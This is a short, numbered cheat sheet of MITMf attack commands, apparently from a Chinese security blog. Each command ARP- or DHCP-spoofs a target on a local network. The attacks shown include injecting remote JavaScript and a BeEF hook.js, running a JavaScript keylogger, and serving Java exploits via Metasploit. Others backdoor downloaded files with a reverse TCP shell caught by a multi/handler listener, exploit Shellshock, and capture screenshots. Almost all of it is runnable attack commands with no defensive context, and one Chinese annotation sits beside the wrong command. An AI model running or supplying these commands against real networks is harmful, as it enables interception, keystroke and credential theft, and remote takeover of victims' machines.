git clone https://github.com/byt3bl33d3r/MITMf.git /opt/mitmf/
1.
./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –inject –html-url http://www.freebuf.com
2.
./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –inject –js-url http://linvex.xxx.cn/test.js
3.
./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –jskeylogger
4.
#msfconsole
msf > load msgrpc Pass=abc123
./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –javapwn –msfip 192.168.217.137
5.
msfconsole
use exploit/multi/handler
set LHOST 192.168.217.137
set LPORT 1447
run
/usr/share/mitmf/config/mitmf.conf
…………SNIP…………
[[[WindowsIntelx86]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.217.137
PORT = 1447
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True
MSFPAYLOAD = windows/shell_reverse_tcp
…………SNIP…………
./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –filepwn
6.
./mitmf.py –iface eth0 –spoof –dhcp –shellshock
7.
mitmf -i eth0 –spoof –arp –gateway 192.168.1.1 –target 192.168.1.126 –screen
8.
一个键盘记录js。有SSL的网站无法记录
mitmf -i eth0 –spoof –arp –gateway 192.168.1.1 –target 192.168.1.126 –browserprofiler
9.
恶搞模块,让浏览器的图片翻转。
mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.126 –upsidedownternet
10.
xss with beef
mitmf -i eth0 –spoof –arp –gateway 192.168.1.1 –target 192.168.1.126 –inject –js-url http://192.168.1.158:3000/hook.js